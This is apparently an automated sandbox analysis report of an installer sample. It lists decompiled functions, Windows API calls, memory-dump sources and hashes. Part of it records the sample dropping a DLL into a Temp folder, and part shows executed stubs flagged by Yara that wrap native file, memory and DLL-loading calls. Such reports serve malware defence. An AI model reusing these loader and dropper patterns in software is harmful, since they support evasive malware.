                                                                        • CharNextA.USER32(00000000), ref: 00405581
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3213498283-3081826266
                                                                        • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                        • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                        • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                        • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E00401D8E() {
                                                                        				void* __esi;
                                                                        				int _t6;
                                                                        				signed char _t11;
                                                                        				struct HFONT__* _t14;
                                                                        				void* _t18;
                                                                        				void* _t24;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                        				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
                                                                        				 *0x4093e8 = E00402A7D(3);
                                                                        				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                        				 *0x4093ef = 1;
                                                                        				 *0x4093ec = _t11 & 0x00000001;
                                                                        				 *0x4093ed = _t11 & 0x00000002;
                                                                        				 *0x4093ee = _t11 & 0x00000004;
                                                                        				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
                                                                        				_t14 = CreateFontIndirectA(0x4093d8);
                                                                        				_push(_t14);
                                                                        				_push(_t26);
                                                                        				E0040591D();
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
                                                                        				return 0;
                                                                        			}











                                                                        0x00401d9c
                                                                        0x00401db5
                                                                        0x00401dbf
                                                                        0x00401dc4
                                                                        0x00401dcf
                                                                        0x00401dd6
                                                                        0x00401de8
                                                                        0x00401dee
                                                                        0x00401df3
                                                                        0x00401dfd
                                                                        0x00402536
                                                                        0x00401581
                                                                        0x004028d7
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D95
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                        • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                        • String ID:
                                                                        • API String ID: 3272661963-0
                                                                        • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                        • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                        • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                        • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				int _t19;
                                                                        				long _t23;
                                                                        
                                                                        				if(_a8 != 0x102) {
                                                                        					__eflags = _a8 - 2;
                                                                        					if(_a8 == 2) {
                                                                        						 *0x40929c =  *0x40929c | 0xffffffff;
                                                                        						__eflags =  *0x40929c;
                                                                        					}
                                                                        					__eflags = _a8 - 0x200;
                                                                        					if(_a8 != 0x200) {
                                                                        						_t23 = _a16;
                                                                        						goto L9;
                                                                        					} else {
                                                                        						_t19 = IsWindowVisible(_a4);
                                                                        						__eflags = _t19;
                                                                        						if(_t19 == 0) {
                                                                        							L12:
                                                                        							_t23 = _a16;
                                                                        							L13:
                                                                        							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
                                                                        						}
                                                                        						_t23 = E00404627(_a4, 1);
                                                                        						_a8 = 0x419;
                                                                        						L9:
                                                                        						__eflags = _a8 - 0x419;
                                                                        						if(_a8 == 0x419) {
                                                                        							__eflags =  *0x40929c - _t23; // 0xffffffff
                                                                        							if(__eflags != 0) {
                                                                        								 *0x40929c = _t23;
                                                                        								E004059BF(0x79f580, 0x7a4000);
                                                                        								E0040591D(0x7a4000, _t23);
                                                                        								E00401410(6);
                                                                        								E004059BF(0x7a4000, 0x79f580);
                                                                        							}
                                                                        						}
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				if(_a12 == 0x20) {
                                                                        					E00403DF3(0x413);
                                                                        					return 0;
                                                                        				}
                                                                        				goto L12;
                                                                        			}





                                                                        0x00404cad
                                                                        0x00404cca
                                                                        0x00404cce
                                                                        0x00404cd0
                                                                        0x00404cd0
                                                                        0x00404cd0
                                                                        0x00404cd7
                                                                        0x00404ce3
                                                                        0x00404d03
                                                                        0x00000000
                                                                        0x00404ce5
                                                                        0x00404ce8
                                                                        0x00404cee
                                                                        0x00404cf0
                                                                        0x00404d43
                                                                        0x00404d43
                                                                        0x00404d46
                                                                        0x00000000
                                                                        0x00404d56
                                                                        0x00404cfc
                                                                        0x00404cfe
                                                                        0x00404d06
                                                                        0x00404d06
                                                                        0x00404d09
                                                                        0x00404d0b
                                                                        0x00404d11
                                                                        0x00404d20
                                                                        0x00404d26
                                                                        0x00404d2d
                                                                        0x00404d34
                                                                        0x00404d3b
                                                                        0x00404d40
                                                                        0x00404d11
                                                                        0x00000000
                                                                        0x00404d09
                                                                        0x00404ce3
                                                                        0x00404cb3
                                                                        0x00404cbe
                                                                        0x00000000
                                                                        0x00404cc3
                                                                        0x00000000

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404CE8
                                                                        • CallWindowProcA.USER32 ref: 00404D56
                                                                          • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                        • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                        • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                        • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                        				int _t5;
                                                                        				long _t7;
                                                                        				struct _OVERLAPPED* _t11;
                                                                        				intOrPtr* _t15;
                                                                        				void* _t17;
                                                                        				int _t21;
                                                                        
                                                                        				_t15 = __esi;
                                                                        				_t11 = __ebx;
                                                                        				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                        					_t7 = lstrlenA(E00402A9A(0x11));
                                                                        				} else {
                                                                        					E00402A7D(1);
                                                                        					 *0x40a018 = __al;
                                                                        				}
                                                                        				if( *_t15 == _t11) {
                                                                        					L8:
                                                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                        				} else {
                                                                        					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", _t7, _t17 + 8, _t11);
                                                                        					_t21 = _t5;
                                                                        					if(_t21 == 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                                                        				return 0;
                                                                        			}









                                                                        0x0040253c
                                                                        0x0040253c
                                                                        0x0040253f
                                                                        0x0040255a
                                                                        0x00402541
                                                                        0x00402543
                                                                        0x00402548
                                                                        0x0040254f
                                                                        0x00402561
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x00402567
                                                                        0x00402579
                                                                        0x004015c8
                                                                        0x004015ca
                                                                        0x00000000
                                                                        0x004015d0
                                                                        0x004015ca
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll, xrefs: 00402548, 0040256D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileWritelstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 427699356-1876267922
                                                                        • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                        • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                        • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                        • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405513(char* _a4) {
                                                                        				char* _t3;
                                                                        				char* _t4;
                                                                        
                                                                        				_t4 = _a4;
                                                                        				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                        				while( *_t3 != 0x5c) {
                                                                        					_t3 = CharPrevA(_t4, _t3);
                                                                        					if(_t3 > _t4) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				 *_t3 =  *_t3 & 0x00000000;
                                                                        				return _t3;
                                                                        			}





                                                                        0x00405514
                                                                        0x0040551e
                                                                        0x00405520
                                                                        0x00405527
                                                                        0x0040552f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040552f
                                                                        0x00405531
                                                                        0x00405535

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-224404859
                                                                        • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                        • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                        • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                        • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405624(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t10;
                                                                        				int _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t15 = lstrlenA(_a8);
                                                                        				_t16 = _a4;
                                                                        				while(lstrlenA(_t16) >= _t15) {
                                                                        					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                        					_t10 = lstrcmpiA(_t16, _a8);
                                                                        					if(_t10 == 0) {
                                                                        						return _t16;
                                                                        					}
                                                                        					_t16 = CharNextA(_t16);
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        0x00405630
                                                                        0x00405632
                                                                        0x0040565a
                                                                        0x0040563f
                                                                        0x00405644
                                                                        0x0040564f
                                                                        0x00000000
                                                                        0x0040566c
                                                                        0x00405658
                                                                        0x00405658
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                        • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                        • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                        • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 37%
                                                                        			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t18;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        
                                                                        				_t13 = _a4;
                                                                        				_t28 = _a4 + 0xc48;
                                                                        				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                        				_t6 =  &_a32; // 0x413d42
                                                                        				_t12 =  &_a8; // 0x413d42
                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                        				return _t18;
                                                                        			}






                                                                        0x00418263
                                                                        0x0041826f
                                                                        0x00418277
                                                                        0x00418282
                                                                        0x0041829d
                                                                        0x004182a5
                                                                        0x004182a9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                        				char* _v8;
                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                        				char _v536;
                                                                        				void* _t15;
                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                        				void* _t30;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_v8 =  &_v536;
                                                                        				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                        				_t31 = _t30 + 0xc;
                                                                        				if(_t15 != 0) {
                                                                        					_t17 = E0041AF60(__eflags, _v8);
                                                                        					_t32 = _t31 + 4;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						E0041B1E0( &_v12, 0);
                                                                        						_t32 = _t32 + 8;
                                                                        					}
                                                                        					_t18 = E004192F0(_v8);
                                                                        					_v16 = _t18;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                        						return _v16;
                                                                        					}
                                                                        					return _t18;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        			}













                                                                        0x00409b2c
                                                                        0x00409b2f
                                                                        0x00409b34
                                                                        0x00409b39
                                                                        0x00409b43
                                                                        0x00409b48
                                                                        0x00409b4b
                                                                        0x00409b4d
                                                                        0x00409b55
                                                                        0x00409b5a
                                                                        0x00409b5a
                                                                        0x00409b61
                                                                        0x00409b69
                                                                        0x00409b6c
                                                                        0x00409b6e
                                                                        0x00409b82
                                                                        0x00000000
                                                                        0x00409b84
                                                                        0x00409b8a
                                                                        0x00409b3e
                                                                        0x00409b3e
                                                                        0x00409b3e

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                        				long _t21;
                                                                        				void* _t31;
                                                                        
                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                        				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                        				return _t21;
                                                                        			}





                                                                        0x004181bf
                                                                        0x004181c7
                                                                        0x004181fd
                                                                        0x00418201

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t14;
                                                                        				void* _t21;
                                                                        
                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                        				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                        				return _t14;
                                                                        			}





                                                                        0x0041839f
                                                                        0x004183a7
                                                                        0x004183c9
                                                                        0x004183cd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004182DC(void* __eax, void* __ebx, intOrPtr _a4, void* _a8) {
                                                                        				long _t10;
                                                                        				void* _t14;
                                                                        
                                                                        				asm("lds ebx, [ebp+0x55]");
                                                                        				_t7 = _a4;
                                                                        				_t2 = _t7 + 0x10; // 0x300
                                                                        				_t3 = _t7 + 0xc50; // 0x409733
                                                                        				E00418DB0(_t14, _a4, _t3,  *_t2, 0, 0x2c);
                                                                        				_t10 = NtClose(_a8); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        0x004182de
                                                                        0x004182e3
                                                                        0x004182e6
                                                                        0x004182ef
                                                                        0x004182f7
                                                                        0x00418305
                                                                        0x00418309

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 28c77184fe95edaf1826af25dc0f66afdfade83a195358f500431b5d572c955f
